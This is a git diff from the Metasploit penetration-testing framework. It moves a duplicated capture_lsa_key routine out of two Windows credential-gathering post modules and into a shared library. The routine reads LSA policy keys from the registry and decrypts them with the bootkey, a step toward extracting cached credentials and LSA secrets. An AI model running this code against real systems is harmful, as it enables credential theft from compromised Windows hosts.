diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb index 37e822dcfe..6b773fbcc3 100644 --- a/lib/msf/core/post/windows/priv.rb +++ b/lib/msf/core/post/windows/priv.rb @@ -151,4 +151,48 @@ module Msf::Post::Windows::Priv return key.pack("C*") end + # + # Returns the LSA key upon input of the unscrambled bootkey + # + def capture_lsa_key(bootkey) + begin + vprint_status("Getting PolSecretEncryptionKey...") + ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ) + pol = ok.query_value("").data + vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") + ok.close + print_status("XP or below client") + @vista = 0 + rescue + vprint_status("Trying 'V72' style...") + vprint_status("Getting PolEKList...") + ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ) + pol = ok.query_value("").data + vprint_good("Pol: #{pol.unpack("H*")[0]}") + ok.close + print_status("Vista or above client") + @vista = 1 + end + + if( @vista == 1 ) + lsakey = decrypt_lsa(pol, bootkey) + lsakey = lsakey[68,32] + vprint_good(lsakey.unpack("H*")[0]) + else + md5x = Digest::MD5.new() + md5x << bootkey + (1..1000).each do + md5x << pol[60,16] + end + + rc4 = OpenSSL::Cipher::Cipher.new("rc4") + rc4.key = md5x.digest + lsakey = rc4.update(pol[12,48]) + lsakey << rc4.final + lsakey = lsakey[0x10..0x1F] + end + return lsakey + end + + end diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 5fcccd8aae..616030f2c4 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -53,44 +53,6 @@ class Metasploit3 < Msf::Post end end - def capture_lsa_key(bootkey) - begin - print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] ) - ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ) - pol = ok.query_value("").data - print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] ) - ok.close - print_status("XP compatible client") - @vista = 0 - rescue - print_status("Trying 'Vista' style...") - print_status("Getting PolEKList...") if( datastore['DEBUG'] ) - ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ) - pol = ok.query_value("").data - ok.close - print_status("Vista compatible client") - @vista = 1 - end - - if( @vista == 1 ) - lsakey = decrypt_lsa(pol, bootkey) - lsakey = lsakey[68,32] - else - md5x = Digest::MD5.new() - md5x << bootkey - (1..1000).each do - md5x << pol[60,16] - end - - rc4 = OpenSSL::Cipher::Cipher.new("rc4") - rc4.key = md5x.digest - lsakey = rc4.update(pol[12,48]) - lsakey << rc4.final - lsakey = lsakey[0x10..0x1F] - end - return lsakey - end - def decrypt_secret(secret, key) # Ruby implementation of SystemFunction005 diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb index 8d472d479b..772eab3e7d 100644 --- a/modules/post/windows/gather/credentials/lsa.rb +++ b/modules/post/windows/gather/credentials/lsa.rb @@ -30,46 +30,6 @@ class Metasploit3 < Msf::Post )) end - def capture_lsa_key(bootkey) - begin - #print_status("Getting PolSecretEncryptionKey...") - ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ) - pol = ok.query_value("").data - #print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") - ok.close - print_status("XP compatible client") - @vista = 0 - rescue - #print_status("Trying 'V72' style...") - #print_status("Getting PolEKList...") - ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ) - pol = ok.query_value("").data - #print_good("Pol: #{pol.unpack("H*")[0]}") - ok.close - print_status("V/7/2k8 compatible client") - @vista = 1 - end - - if( @vista == 1 ) - lsakey = decrypt_lsa(pol, bootkey) - lsakey = lsakey[68,32] - #print_good(lsakey.unpack("H*")[0]) - else - md5x = Digest::MD5.new() - md5x << bootkey - (1..1000).each do - md5x << pol[60,16] - end - - rc4 = OpenSSL::Cipher::Cipher.new("rc4") - rc4.key = md5x.digest - lsakey = rc4.update(pol[12,48]) - lsakey << rc4.final - lsakey = lsakey[0x10..0x1F] - end - return lsakey - end - def decrypt_secret(secret, key) # Ruby implementation of SystemFunction005